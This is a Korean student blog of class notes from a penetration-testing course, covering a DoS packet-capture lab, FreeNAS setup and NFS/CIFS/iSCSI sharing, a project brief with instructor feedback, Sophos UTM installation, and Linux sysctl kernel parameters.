-> [실습] 공격 방법을 HTTP/TCP/UDP를 선택하고 wireshark를 통해 패킷을 분석한다.

■ TCP Attack

---------------------

192.168.20.50 192.168.20.200 TCP 78 [TCP segment of a reassembled PDU]

■ UDP Attack

---------------------

192.168.20.50 192.168.20.200 QUIC 54 CID: 32, Seq: 28519

■ HTTP Attack

---------------------

192.168.20.50 192.168.20.200 TCP 74 60734→80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=127301 TSecr=0 WS=1024

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160823 Snort on CentOS6.X (0)	2016.08.23
20160823 DoS, DDoS, SNORT (0)	2016.08.23
20160822 NAS(Network Attached Storage) (0)	2016.08.22
20160819 프로젝트#4 + 피드백 (0)	2016.08.19
20160805 Sophos UTM (0)	2016.08.05

Posted by 22Hz

, |

20160822 NAS(Network Attached Storage)

모의해킹 침해대응 전문가 과정 / 2016. 8. 22. 21:23

NAS(Network Attached Storage)

■ 용어

● DAS(Direct Attached Storage)

● SAN(Storage Area Network)

● NAS(Network Attached Stotrage)

● FC Protocol

● IP Protocol

■ DAS(Block Level Access)

- Internal DAS(EX: 내장 디스크)

- External DAS(EX: 외장 디스크)

■ SAN(Block Level Access)

- FC SAN

- IP SAN(EX: iSCSI, FCIP, FCoE)

■ NAS(File Level Access)

NAS vs. SAN

● Network Attached Storage(NAS)
- Connect to a shared storage device across the network
- File-level access

● Storage Area Network(SAN)
- Looks and feels like a local storage device
- Block-level acdess
- Very efficient reading and writeing

● Requires a lot of bandwidth
- May use an isolated network and high-speed network technologies

Fibre Channel(FC)

● A specialized high-speed topology
- Connect servers to storage
- 2-,4-,8- and 16-gigabit per second rates
- Supported over both fiber and copper

● Servers and storage connect to a Fibre Channel switch
- Server(initiator) needs a FC interface
- Storage(target) is commonly referenced by SCSI, SAS, or SATA commands

Fibre Channel over the data network

● Fibre Channel over Ethernet(FCoE)
- Use Fibre Channel over an Ethernet network
- No special networking hardware needed
- Useally integrates with an existing Fibre Channel infrastructure
- Not routable

● Fibre Channel over IP(FCIP)
- Encapsulate Fibre Channel data into IP packets
-> Fibre Channel tunneling
- Geographically separate the servers from the storage

iSCSI

● Internet Small Computer Systems Interface
- Send SCSI commands over an IP network
- Created by IBM and Cisco, now an RFC standard

● Makes a remote disk look and operate like a local disk
- Like Fibre Channel

● Can be managed quite well in software
- Drivers available for many operating systems
- No proprietary topologies or hardware needed

On the whole, we are storing more data than ever before and the numbers continue to increase. From a security perspective, this becomes extremely important because a lot of this data is being transferred across the network. When we talk about storage that’s across the network, we tend to use two terms almost interchangeably, but these two terms are actually very different.

One is Network Attached Storage, or NAS. The NAS storage is storage that is outside of our device. We’re connecting to across the network, but we access the data on that storage at a file level. If we need to change just part of a file, then we have to overwrite the entire file on that storage device. And likewise, if we need just a little bit of data out of a file, we have to retrieve the entire file from that device to be able to work with it.

Another common term you’ll hear for this remote storage device is a SAN, or a Storage Area Network. It is indeed a storage device that is located across the network. But under the surface, it works very differently. A SAN works on something called block-level access. This is very similar to how our local hard drives and storage devices work on our local computers, where if we need to change part of a file, we simply change the individual bytes within that file that we need to change and we leave the rest of the file untouched. Works exactly the same with a SAN, except we’re performing that communication across the network. And as it sounds, it’s much more efficient for reading and writing, because you’re only changing or you’re only reading the information that you need at that particular time.

One very common thing for both of these technologies is that they use a lot of bandwidth. You’re storing information across the network and every time you want to send a file or receive a file, you’re going to be using a lot of bandwidth on that network. It’s very common to engineer these types of networks so that they are on their own isolated network that has no effect on any of the other network traffic in your organization. And it’s not unusual to see very, very high speeds dedicated to this Storage Area Network or the network-attached storage.

The need for such high rates of speed across these storage networks has really driven the creation of a specialized topology called Fibre Channel. This Fibre Channel technology connects directly from a server with a Fibre Channel port to the storage, which is on a, also of course, a Fibre Channel port. And these are very high rates of speed. You can run from two gigabits per second all the way up to the modern versions of 16 gigabits per second over that Fibre Channel link.

Although the initial implementations of Fibre Channel ran over fiber optic technology, today’s modern version of Fibre Channel will run over both fiber and copper cables. Just as ethernet has switches that support the communication across the ethernet topology, Fibre Channel also has Fibre Channel switches that everybody connects to. So if you have a server that needs to connect to Fibre Channel storage, then you will need a Fibre Channel port somewhere on that server.

Often very high end servers will have a Fibre Channel interface already built into the motherboard. But you could, of course, add an adapter card to provide that interface as well. Servers are often referred to as initiators, and the storage devices themselves are referred to as the targets on a Fibre Channel topology. The communication between the initiator and the target is often over very well known technologies like SCSI, serial attached SCSI, or using SATA commands.

On a Fibre Channel storage network, you would ideally connect directly to the Fibre Channel switch. But if you do have devices that are outside the network or still need access to the Fibre Channel storage but don’t have a Fibre Channel interface, you can run Fibre Channel over Ethernet, or FCOE. This communicates and sends Fibre Channel messages over an ethernet network and it doesn’t require your workstation or your server to have a specialized Fibre Channel interface. This is usually something that is integrating to an existing Fibre Channel infrastructure. So there is usually an ethernet connection coming out of your fiber channel switches that provides this link between the Fibre Channel world and the ethernet world.

Fibre Channel over Ethernet is a non-routable protocol that’s using the ethernet frames as communication. So it’s something that you commonly see within a single subnet or a single local area. You don’t often run this type of technology over larger distances where all of that traffic would be routed.

Of course, there’s a solution for sending Fibre Channel information over these routable IP networks, and that’s called Fibre Channel over IP, or FCIP. Fibre Channel over IP is taking all the Fibre Channel information and encapsulating it within the TCP/IP packets themselves. This is sometimes referred to as Fibre Channel tunneling, because we’re putting all the Fibre Channel information and tunneling it through that IP network.

This allows us to have devices that are very geographically dispersed across multiple locations and multiple data centers, but still able to send information and use the storage network on the Fibre Channel infrastructure.

Another popular technology for connecting you to your data across the network is called iSCSI. iSCSI stands for internet small computer systems interface. If you’ve ever worked with SCSI drives on a local computer, this is a way to extend that technology across the network through a routed set of protocols. It’s a standard that was created by IBM and Cisco. And it’s one that, instead of being proprietary, is very open. There’s an RFC standard for iSCSI.

Just like Storage Area Networks and Fibre Channel, iSCSI allows you to use the storage across the network, but make that storage look like it is on your local computer. That block-level storage means you have very efficient reads and writes to that storage. And because it’s SCSI, it’s something that is very well known in the industry. SCSI’s been around for a very long time. And the commands used to access SCSI devices are ones that the developers are very comfortable with. Drivers are available for iSCSI across many different operating systems, and it’s quite easy to implement because you don’t need any proprietary hardware or software to make iSCSI work.

■ FC-SAN(Fibre Channel Storage Area Network)

■ IP-SAN

■ iSCSI

■ FC-IP

■ iSCSI

■ FC-IP

■ FCoE(FC over Ethernet)

■ NAS(Network Attached Storage)

[실습] FreeNAS 설치 및 활용

대표적인 NAS 전용 OS 종류

● FreeNAS(http://www.freenas.org)

● NAS4Free

● OpenMediaVault

NAS 전용 OS에 대한 자세한 차이점은 아래 사이트를 참고한다.

● http://gigglehd.com/zbxe/12355614

FreeNAS에 대해서(http://www.freenas.org/about/features.html)

(1) Storage, liberated.

(2) Network-attached-storage (NAS) software that is both free to use and free as in open source code.

(3) Your data's best friend.

FreeNAS is an operating system that can be installed on virtually any hardware platform to share computer data storage over a computer network. 'Free' as in 'free and open source' and 'NAS' as in "network-attached storage", FreeNAS is the simplest way to create a centralized and easily-accessible home for your data.

The FreeNAS project and software were founded in 2005 on the principle that network storage be made available to the world at no cost and unencumbered by license restrictions. The FreeNAS Project has a mature community and a team of developers dedicated to meeting that goal and providing the best (open-source) network file storage solution in the world.

● 복제(Replication)

ZFS Snapshots are more than just local backups - they can be used to create remote backups as well. Replicating snapshots of the filesystem to a remote ZFS filesystem creates a complete duplicate there. Furthermore, additional snapshots of the same filesystem can be sent incrementally, reducing the size of each backup to the changes that were made between snapshots. In case of catastrophic damage to a local ZFS filesystem (such as disk failure in excess of parity protection or irrecoverable log device failure), any backed-up snapshot can be sent to a new ZFS filesystem, recovering all data up to that backup.

● 데이터 보호(Data Protection)

ZFS is designed for data integrity from top to bottom. RAID-Z, the software RAID that is part of ZFS, offers single parity protection like RAID 5, but without the “write hole” vulnerability thanks to the copy-on-write architecture of ZFS. The additional levels RAID-Z2 and RAID-Z3 offer double and triple parity protection, respectively. A software mirror option is also available. The FreeNAS Volumes screen lists each possible parity arrangement based on the number of disks you select when creating a new volume.

Every ZFS filesystem is also verified with checksums from top to bottom to ensure data integrity. If inconsistencies are found, parity blocks can be used to repair corrupt data. A regular scrub is turned on by default and can be rescheduled or configured from the web interface.

● 백업 서비스(Backup Services)
- Windows Backup
- Apple Time Machine
- rsync
- PC-BSD Life Preserver

● 압호화(Encryption)

FreeNAS is the first and only open source project to offer encryption on ZFS volumes! A full-volume encryption option is available during volume creation, providing industry standard AES-XTS encryption which can be hardware-accelerated (when the processor has AES-NI capability).

Encrypted volumes can only be read by FreeNAS systems in possession of the master key for that volume. The user can optionally create a passphrase to add an additional layer of protection for when the whole system is stolen.

Encryption allows for confidence when retiring and recycling hard drives because the drives no longer need to be wiped provided the master keys are obliterated

● 스냅샷(Snapshots)

Thanks to ZFS, snapshots of the entire filesystem can be made and saved at any time. As long as a snapshot exists, administrators can access files as they were when the snapshot was made.

Snapshots can be made on a one-off basis or scheduled as a cron job from the web interface. At any time, the entire filesystem can be rolled back to the most recent snapshot. Older snapshots can be cloned and accessed to recover data from that version of the filesystem. From the web interface, users can see how much space a particular snapshot is occupying on the volume and delete, clone, or roll back to individual snapshots as needed

● 파일 공유(File Sharing)

File sharing is what FreeNAS does best. Every major operating system is supported with SMB/CIFS (Windows file shares), NFS (Unix file shares) and AFP (Apple File Shares) as well as FTP, iSCSI (block sharing), WebDAV and other methods of sharing data over the network are available. iSCSI also supports VMware VAAI, Microsoft ODX and Microsoft Windows Server 2008 and 2012 R2 Clustering.

Most operating systems, including Windows, Mac OS X, many Linux distributions, and PC-BSD® can connect using SMB shares with little or no additional configuration needed on the client side. Most Unix-like operating systems support connecting with NFS out of the box, and free clients are widely available. AFP is primarily used by Mac OSX and is well suited for a network environment that only connects with Macintosh clients. FreeNAS® also supports Time Machine backups with a few minor tweaks on the system being backed up.

● 웹 인터페이스(Web Interface)

If FreeNAS has one goal, it’s simplifying complex administrative tasks for as wide a user base as possible. Every aspect of a FreeNAS system can be managed from a Web User Interface. A setup Wizard further simplifies configuration at installation time or later in the setup process. Volume creation, or the setting of permissions on individual shares or performing software updates, can be done without missing a critical step or encountering a silent failure.

Of course, the FreeNAS Team knows we can’t think of everything. Many services have advanced configuration options available from the Web User Interface that is available in advanced menus. The full power of the FreeBSD shell environment is also available just a click away or through SSH. Ultimately, FreeNAS makes NAS deployment easier than ever but doesn’t get between you and the solution you need

● 플러그인(Plugins)

FreeNAS® supports the core features of a NAS appliance out of the box. However, many users like to enhance their NAS appliance with third party software for media streaming, alternative protocols, or web applications.

To make sure your NAS can do everything you want, FreeNAS offers a third-party plugin system based on the FreeBSD jails system and the PBI system from PC-BSD. The plugin system isolates third-party software from the core operating system but allows plugins access to user-specified directories and configuration from the main Web User Interface.

FreeNAS 문서는 아래 사이트에서 참고한다.

● http://doc.freenas.org/

● http://doc.freenas.org/9.3/freenas.html

● http://web.freenas.org/images/resources/freenas9.2.1/freenas9.2.1_guide.pdf

● http://www.freenas.org/images/resources/freenas8.3.1/freenas8.3.1_guide.html

[실습1] FreeNAS 설치

설치 과정 유투브 동영상

● https://www.youtube.com/watch?v=k-mRgeDS8rk

준비 사항

● VMware Workstation 프로그램

● FreeNAS ISO 이미지

(가정) VMware workstation 설치 되어 있는 것으로 가정한다.

① FreeNAS를 위한 VM 생성

Select a Guest Operating System

● Guest operating system : Other

● Version : FreeBSD 64-bit

Name the virtual Machine

● Virtual machine name : FreeNAS

● Location : 적당한 위치

Specify Disk Capacity

● Maximum disk size(GB) : 20.0

● [ V ] Store virtual disk as a single file

MEM : 1G 정도

CPU : core 개수 설정

CD/DVD : 위치 지정

새로운 디스크를 7개 장착한다.(주의: 2G 초과 되는 디스크만을 장착해야 한다.)

● 3G : 2개

● 4G : 2개

● 5G : 3개

② FreeNAS 설치 과정

FreeNAS VM Power ON

■ GNU GUB version 2.02~beta2 화면 : <ENTER>

■ FreeNAS 9.3.1-STABLE Console Setup : 1 Install/Upgrade

■ Choose destination media : [ V ] da0 VMware, VMware Virtual S 1.0 -- 20.0 GiB

■ FreeNAS installation : <YES>

■ Enter your root password : soldesk1. (두번 입력)

■ reboot

[실습2] FreeNAS 초기 설정

윈도우에서 FreeNAS 접속하여 설정한다.

- http://192.168.10.137

- ID/PASS: root/soldesk1.

Initial Wizard 창이 나오면 그냥 종료하고 직접 설정하는것으로 한다.

다음과 같은 메인 매뉴가 존재한다.

● Account

● System

● Tasks

● Network

● Storage

● Directory Service

● Sharing

● Services

● Plugins

● Jails

● Reporting

● Guide

● Wizard

● Display System Processes

● Shell

● Log Out

● Reboot

● Shutdown

① 네트워크 설정

Network > Global Configuration

② 언어 및 타임 존 설정

System > General

새로 접속하면 한글로 보여 질것이다.

[실습3] 공유를 위한 사용자 추가

계정 > Users > Add User

[실습4] 리눅스를 위한 Dataset 생성과 공유 설정

① 볼륨 생성

저장소 > Volumes > Volume Manager

② Dataset 생성

저장소 > Volumes > SharePool 선택 > Create Dataset 아이콘 선택

③ Dataset에 퍼미션 설정

저장소 > Volumes > SharePool > LinuxShare1 선택 > Change Permission 선택

-> 테스트용이므로 모든 퍼미션을 주었다.

④ 공유 설정

공유 > Sharing > 유닉스 (NFS) > Add Unix (NFS) Share((주의)고급모드까지 선택한다.)

⑤ 리눅스 머신에서 공유된 자원 마운트 테스트

linux200 서버 Power ON

linux200 네트워크 설정:

IP/NETMASK : 192.168.10.200/24

Gateway : 192.168.10.2

# showmount -e 192.168.10.137

Export list for 192.168.10.137:

/mnt/SharePool/LinuxShare1 (everyone)

# mkdir -p /mnt/nas

# mount 192.168.10.137:/mnt/SharePool/LinuxShare1 /mnt/nas

# df -h

Filesystem Type Size Used Avail Use% Mounted on

/dev/mapper/VolGroup00-LogVol00

ext3 37G 3.6G 32G 11% /

/dev/sda1 ext3 99M 19M 76M 20% /boot

tmpfs tmpfs 506M 0 506M 0% /dev/shm

/dev/hdc iso9660 3.9G 3.9G 0 100% /media/CentOS_5.9_Final

192.168.10.137:/mnt/SharePool/LinuxShare1

nfs 975M 128K 975M 1% /mnt/nas

# cd /mnt/nas

# cp /etc/passwd file1

# ls -l

total 4.5K

-rw-r--r-- 1 4294967294 root 2.0K Feb 16 13:01 file1

-> file1 생성되지 않는다면 NAS에서 퍼미션 변경 작업을 해야 한다.

# cd

# umount /mnt/nas

# df -h

-> 언마운트 확인

linux200 서버 Power OFF

[실습5] 윈도우를 위한 Dataset 생성과 공유 설정

① Dataset 생성

저장소 > Volumes > SharePool 선택 > Create Dataset 선택

② 퍼미션 변경

SharePool > WindowsShare1 선택 > Change Permission

③ 공유 설정

공유 > Sharing > 윈도우 (CIFS) > Add Windows (CIFS) Share

※ Use as home share 체크 해제!!

④ 윈도우즈 서버에서 공유 폴더 접근하기

Windows 2008 R2 서버 Power ON

네트워크 설정:

IP/NETMASK: 192.168.10.201/24

Gateway : 192.168.10.2

\\192.168.10.137	"네트워크 드라이브 연결"

WindowsShare1에 마우스 포인터를 대고 오른쪽 마우스를 선택하여 "네트워크 드라이브 연결"을 선택한다. (주의) 반드시 "[ V ] 다른 자격 증명을 사용하여 연결" 부분을 체크하여야 한다.

다음 정보를 사용하여 네트워크 드라이브 연결을 한다.

- ID/PASS: freenasuser1/freenas1

적당한 파일을 네트워크 드라이브에 생성해 본다.

[참고] 윈도우를 위한 iSCSI 설정

① 인증된 접근(Authorized Access) 설정

Sharing > Block(iSCSI) > Authorized Access > Add Authorized Access

● User Secret : soldeskfreenas

● Peer User Secret : soldeskfreenas1. / soldeskfreenas1,

② Initiator 추가

Sharing > Block(iSCSI) > Initiators > Add Initiator

③ Portal 추가

Sharing > Block(iSCSI) > Portals > Add Portal

④ Target 추가

Sharing > Block(iSCSI) > Targets > Add Target

⑤ Device extent 설정

Storage > Volumes > Volumes Manager >

Storage > Volumes > iscsipool 선택 > Create zvol 선택

-> 같은 방법으로 iscsidisk2 생성한다.(용랑: 100MiB)

Sharing > Block(iSCSI) > Extents > Add Extents

Sharing > Block(iSCSI) > Associated Targets > Add Target / Extent

⑥ iSCSI service 활성화

Services > iSCSI enable(ON)

⑦ 윈도우에서 iscsi 디스크 가져오기

<CTRL + ESC> => iscsi 검색	iSCSI 초기화 속성 > 검색 > 포털 검색

iSCSI 초기화 속성 > 검색 > 포털 검색 > 고급
	이름(N) : soldeskfreenas 대상암호(S): soldeskfreenas1.

디스크 작업을 진행한다.

-> 이 부분에 대한 실습은 따로 기술하지 않는다.

->

https://www.synology.com/ko-kr/knowledgebase/DSM/tutorial/Virtualization/How_to_use_iSCSI_Targets_on_a_Windows_Server

[참고] 추가적인 실습

● iSCSI 설정(리눅스를 위한 iSCSI 설정)
https://www.synology.com/ko-kr/knowledgebase/DSM/tutorial/Virtualization/How_to_set_up_and_use_iSCSI_target_on_Linux

● Plugin 설치 및 운용

[참고] FreeNAS 관련 비디오 포털

다음 사이트를 반드시 참고한다.

http://www.freenas.org/about/videos.html

● FreeNAS 9.3 - iSCSI Overview

● FreeNAS 9.3 Permissions Overview

● How to Replace Failed HDDs in FreeNas 9.3

● FreeNAS 9.3 - First Time Setup Wizard

● FreeNAS 9.3 Shares Overivew

● Host to install FreeNAS 9.3

● How to Upgrade FreeNAS 9.3

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160823 DoS, DDoS, SNORT (0)	2016.08.23
20160822 DoS, DDoS, SNORT (0)	2016.08.23
20160819 프로젝트#4 + 피드백 (0)	2016.08.19
20160805 Sophos UTM (0)	2016.08.05
20160805 Linux Kernel Parameter (0)	2016.08.05

Posted by 22Hz

, |

20160819 프로젝트#4 + 피드백

모의해킹 침해대응 전문가 과정 / 2016. 8. 19. 21:21

        넷 보안 제 4차 프로젝트

목적: UTM 기능 확인 및 테스트

제01조: F/W 기능 확인 및 테스트
제02조: IPS/IDS 기능 확인 및 테스트
제03조: WAF 기능 확인 및 테스트
제04조: SPAM Filter 기능 확인 및 테스트

\\172.16.13.1
\Security과정공유디렉토리
\00_공지사항
\제08기_오전반_제4차_프로젝트

    파일 이름: 제01조_홍길동_FW.txt
    -----------------------------------
    프로젝트 개요:
    프로젝트 진행 일정:
    프로젝트 인원:
        홍길동:
        홍길동:
        홍길동:
    -----------------------------------

\\172.16.13.1
\Security과정공유디렉토리
\00_공지사항
\제08기_오전반_제4차_프로젝트
\제04차_프로젝트
\제01조

    파일이름: <프로젝트 파일들>

매뉴얼 발표는 내용을 줄이더라도 발표시간이 많을수 밖에 없다

느낌상 여지껏 발표중에 제일 괜찮았다

-> 긴장 많이 안하고(얼어있지 않고) 편안하게 말을 해서 그렇다

-> 발표의 목적 많이하는 이유

-> 발표 자세는 좋았다(최종 발표에서 볼 수 있을 모습이라고 생각했다)

-> 겉모양은 좋았으니 내부를 충실하게 내용을 충실하게

4/6개월 정도 지났다

-> 2개월은 많이 남았다고 볼 수 있다

-> 얼마 안남았다고 생각해서 약간 붕 뜬게 아닐까? 그렇게 느껴진다

-> 많이 지쳐있지않은가 의욕이 많이 떨어져있는것처럼 보인다

-> 초심을 되살리면 좋겠다

-> 뭔가를 할 수 있는 기간이 2개월이나 남았다

-> 프로젝트를 2번이나 더 할 수 있고 중간중간 발표를 할 수 있는 시간도 많이 남았다

-> 힘을 냅시다

실무에서는 결과가 중요하다

-> 공부에서는 중간(과정)이 중요하다

-> 공부는 진행형이다 끝이없다 결론이없다

-> 공부는 계속 진행형이지만 실무는 정해진 시간안에 결론이 나야하기 때문에 결과가 중요하다

-> 그 차이점을 인지하고 숙달하기 위한 방식으로 프로젝트를 진행한다

하다가 안되면 어쩔수없지만 처음부터 안하는건 좋은 자세가 아니다

저작자표시 비영리 변경금지

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160822 DoS, DDoS, SNORT (0)	2016.08.23
20160822 NAS(Network Attached Storage) (0)	2016.08.22
20160805 Sophos UTM (0)	2016.08.05
20160805 Linux Kernel Parameter (0)	2016.08.05
20160804 ACL(Access Control List) (0)	2016.08.04

Posted by 22Hz

, |

20160805 Sophos UTM

모의해킹 침해대응 전문가 과정 / 2016. 8. 5. 21:18

보안 위협과 보안 솔루션의 진화 과정

■ 보안 위협의 진화 과정

● 해킹 기법의 다양화(수동 방법 -> 자동 방법)

● 서비스 가용성에 대한 위협 증가

● 유해 트래픽 증가

한국언론전산인협의회발제자료(3주제_보안및해킹트랜드)

■ 보안 솔루션의 발전 과정

● 현재 모든 기업과 기관들이 주요 보안 솔루션으로
- 방화벽(Firewall)
- VPN
- IPS/IDS
- Anti-Virus
- Anti-Spam
- 네트워크 접속 관리
- 기타 contents 보안 제품
등이 구축되어 각종 정보 자산을 보호하고 있다.

한국언론전산인협의회발제자료(3주제_보안및해킹트랜드)

■ 보안 솔루션의 발전 과정

한국언론전산인협의회발제자료(3주제_보안및해킹트랜드)

■ 통합 보안 관리(UTM)

● 보안 사고를 예방하고 신속히 대응하면서 보다 쉽게 보안 관리가 가능하도록 하기 위한 목적으로 기존 보안 제품을 통합하여 여러가지 기능을 제공하면서도 관리가 용이한 UTM 장비가 필요하다.

한국언론전산인협의회발제자료(3주제_보안및해킹트랜드)

FW vs IPS/IDS vs WAF

■ Firewall(방화벽) vs IDS(침입탐지시스템) vs IPS(침입차단시스템)

구분	IPS(침입차단시스템)	IDS(침입탐지시스템)	F/W(침입차단시스템)
연결 방법	In-Line	Mirror(TAP, Switch)	In-Line
차단 방법	자체	Reset Signal, 방화벽 연동	자체
on-way attack	탐지/차단	탐지	불가능
DDoS & Dos	탐지/차단	탐지	일부지원
서비스 중단 시 장애 극복	FOD를 통한 장애 극복	무관	HA, Fail Over를 통한 극복
실시간 네트워크 세션 감시	지원	지원	지원
Worm Virus	탐지/차단	탐지	불가능
NAT	지원 안됨	지원 안됨	지원함
다중포트	2개 구간	8개 구간	NIC 연결 추가 지원
장점	모든 패킷에 대해 자체 탐지 및 차단 모듈 지원으로 네트워크 보호	모든 패킷에 대해 자체 탐지 모듈 지원으로 네트워크 이상 징후 경고	서비스 및 객체 대한 접근 권한 정책을 구체적 규정하는 것이 가능하여 불필요한 서비스 사용 제한
단점	NAT등 방화벽 고유 기능 지원 불가로 사설 네트워크 구성시 제한	방화벽과 연동 방어를 통해 차단 가능함(독립적 차단 제하적)	IP와 Port 이외의 복합적으리고 정교한 공격 탐지 불가

Sophos Installation

■ 설치전 준비사항

- VMware Program(EX: VMWare Workstation 10.x)

- Sophos CD(EX: asg-9.304-9.1.iso)

■ VMware Workstation 다운로드

- http://www.vmware.com

■ Sophos 프로그램 다운로드

- https://www.sophos.com

- https://secure2.sophos.com/en-us/products/utm-9/free-utm-trial.aspx#start

■ Sophos 네트워크 설정

eth0 IP : 192.168.10.254

eth1 IP : 192.168.20.254

■ 네트워크 구성도(EX: XX은행 네트워크 구성도)

Sophos 설치를 위한 VM 생성

- (주의) VM 생성시 반드시 Network Adapter를 2장 설치한다.

Sophos CD 이미지 장착

□ Welcome to Sophos UTM 9! 화면

=> <ENTER>

□ Introduction 화면

=> <Start>

□ Detected Harware 화면

=> <Ok>

□ Select Keyboard 화면

=> English (USA)

□ Select Timezone 화면

=> Asia/

=> Seoul

□ Data and Time

=> <Next>

□ Select Admin Interface 화면

=> eth1 [link] VMware Pro/1000 MT Single Port Adapter

=> <Next>

□ Network Configuration

=> Address: 192.168.20.254

Netmask: 255.255.255.0

Gateway: 없음

=> <Next>

□ 64 bit Kernel Support 화면

=> <Yes>

□ Enterprise Toolkit 화면

=> <Yes>

□ Installation: Partitioning 화면

=> <Yes>

□ Partition (Step #/6) 화면

□ Partitioning (Step 1/6) 화면

□ Formatting (Step 2/6) 화면

□ Copy Packages (Step 3/6) 화면

□ Install Open Source Software (Step 4/6) 화면

□ Install Enterprise Toolkit (Step 5/6) 화면

□ Finishing (Step 6/6) 화면

□ Installation Finished 화면

=> <Reboot>

□ 로그인 창 화면

이제 준비가 완료 되었으므로 웹으로 접속한다.

(Windows 7) https://192.168.20.254:4444

!!!! 설치가 다 되고 나면 반드시 스냅샷을 찍어 놓는다. !!!!

1. Sophos Unified Threat Management

Sophos UTM의 "Basic System Setup" 작업을 진행한다.

■ 사용시스템

- Sophos VM

- Windows 7 VM

(Windows 7)

관리용 시스템인 windows 7에서 Sophos UTM로 크롬(Chrome) 브라우저를 사용하여 접속한다.

- https://192.168.20.254:4444

■ basic system setup

Hostname : utm.example.com

Commany or Organization Name : soldesk

City : Seoul

Country : South Korea

admin account password : soldesk1.

Repeat password : soldesk1.

admin account email address : admin@example.com

■ Login to WebAdmin

Username : admin

Password : soldesk1.

■ Setup wizard

[ v ] continue

[ ] Restore a backup

■ License Installation

License file : 없음

● 라이센스 파일이 없다면 30일간만 사용이 가능하다.

■ Internal (LAN) Network Settings

Internal (LAN) firewall IP : 192.168.20.254

Netmask : /24 (255.255.255.0)

■ Internal Uplink (WAN) Settings

Interface : eth0

Internet uplink type : Standard Ethernet interface with static IP address

Address Type : static

IP address : 192.168.10.254

Netmask : /24 (255.255.255.0)

Default gateway : 192.168.10.2

DNS forwarder IP : 168.126.63.1

■ Allowed Services

Allow these services for internal clients

[ ] Web (HTTP, HTTPS)

[ ] File transfer (FTP)

[ ] Terminal services (Citrix, Apple Remote Desktop, RDP, SSH, Telnet)

[ ] Email (SMTP, POP3, IMAP)

[ ] DNS (outgoing)

For security reaons we recommend to disable all options

[ v ] UTM responds to Pings

[ ] UTM forwards Pings

■ Advanced Threat Protection Settings

[ ] Intrusion Prevention Engine

[ ] Command & Control/Botnet Detection Engine

■ Web Protection Settings

-> 아무것도 설정하지 않는다.

■ Email Protection Settins

[ ] Scan email fetched over POP3

[ ] Configure internal mail server

Finishing the Setup wizard 화면

참고 동영상

■ Setting up Sophos UTM - Training Episode 1

https://www.youtube.com/watch?v=mx6l1f6Bpy0

■Using Sophos UTM Web Protection - Training Episode 2

https://www.youtube.com/watch?v=uI8NbEfxEs4

■ Using Sophos UTM Email Protection - Training Episode 3

https://www.youtube.com/watch?v=tozOXf-L-RY

■ Using Sophos UTM Intrusion Protection - Training Episode 4

https://www.youtube.com/watch?v=HDgJHFIp3Nk

■ How to setup Secure Sockets Layer (SSL) for a virtual private network (VPN) - Training Episode 5

https://www.youtube.com/watch?v=GGt26ZlerpQ&index=6&list=PL_b4O8ZwWOqs-aoLAMubLB1LhZwglTIoo

■ Setting up Web Filtering Profiles - Training Episode 6

https://www.youtube.com/watch?v=2v4_3bph6GA

■ Setting up Backup & Restore - Training Episode 7

https://www.youtube.com/watch?v=-ShStT59GLs

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160822 NAS(Network Attached Storage) (0)	2016.08.22
20160819 프로젝트#4 + 피드백 (0)	2016.08.19
20160805 Linux Kernel Parameter (0)	2016.08.05
20160804 ACL(Access Control List) (0)	2016.08.04
20160804 Linux and Unix sudo command (0)	2016.08.04

Posted by 22Hz

, |

20160805 Linux Kernel Parameter

모의해킹 침해대응 전문가 과정 / 2016. 8. 5. 17:28

Linux Kernel Parameter

■ 리눅스 커널 변수(Linux Kernel Parameter)에 대해서

-> 리눅스 시스템의 커널 변수의 값을 제어하여 시스템을 최적화할 수 있는 방식이다.

-> 리눅스의 커널 패러미터는 /proc/sys 디렉토리에 존재한다.

(예) net.ipv4.icmp_echo_ignore_all <---> /proc/sys/net/ipv4/icmp_echo_ignore_all

■ 커널 패러미터 설정 방법

(임시적) # echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

(영구적) # sysctl -w net.ipv4.icmp_echo_ignore_all=1 ; sysctl -p

or

# vi /etc/sysctl.conf

net.ipv4.icmp_echo_ignore_all = 1

# sysctl -p

■ sysctl CMD, /etc/sysctl.conf

(1) sysctl CMD

NAME

sysctl - configure kernel parameters at runtime

SYNOPSIS

sysctl [-n] [-e] variable ...

sysctl [-n] [-e] [-q] -w variable=value ...

sysctl [-n] [-e] [-q] -p <filename>

sysctl [-n] [-e] -a

sysctl [-n] [-e] -A

DESCRIPTION

sysctl is used to modify kernel parameters at runtime. The parameters

available are those listed under /proc/sys/. Procfs is required for

sysctl(8) support in Linux. You can use sysctl(8) to both read and

write sysctl data.

PARAMETERS

-n Use this option to disable printing of the key name when print-

ing values.

-w Use this option when you want to change a sysctl setting.

-p Load in sysctl settings from the file specified or

/etc/sysctl.conf if none given. Specifying - as filename means

reading data from standard input.

-a Display all values currently available.

-A Same as -a

(명령어 형식)

# sysctl -a (# sysctl -a | grep icmp)

# sysctl -p (/etc/sysctl.conf)

# sysctl -n net.ipv4.icmp_echo_ignore_all

# sysctl -w net.ipv4.icmp_echo_ignore_all=0

[실습] sysctl CMD

■ 대상 선정

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 0

# sysctl -a

.... (생략) ....

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 0

# sysctl -n net.ipv4.ip_forward

0

# sysctl -w net.ipv4.ip_forward=1

net.ipv4.ip_forward = 1

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 1

# cat /proc/sys/net/ipv4/ip_forward

1

# cat /etc/sysctl.conf | grep ip_forward

net.ipv4.ip_forward = 0

# sysctl -w net.ipv4.ip_forward=0

net.ipv4.ip_forward = 0

# cat /proc/sys/net/ipv4/ip_forward

0

# cat /etc/sysctl.conf | grep ip_forward

net.ipv4.ip_forward = 0

# vi /etc/sysctl.conf

# Kernel sysctl configuration file for Red Hat Linux

#

# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and

# sysctl.conf(5) for more details.

# Controls IP packet forwarding

[수정전]

net.ipv4.ip_forward = 0

[수정후]

net.ipv4.ip_forward = 1

.... (중략) ....

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 0

# cat /proc/sys/net/ipv4/ip_forward

0

# sysctl -p

net.ipv4.ip_forward = 1

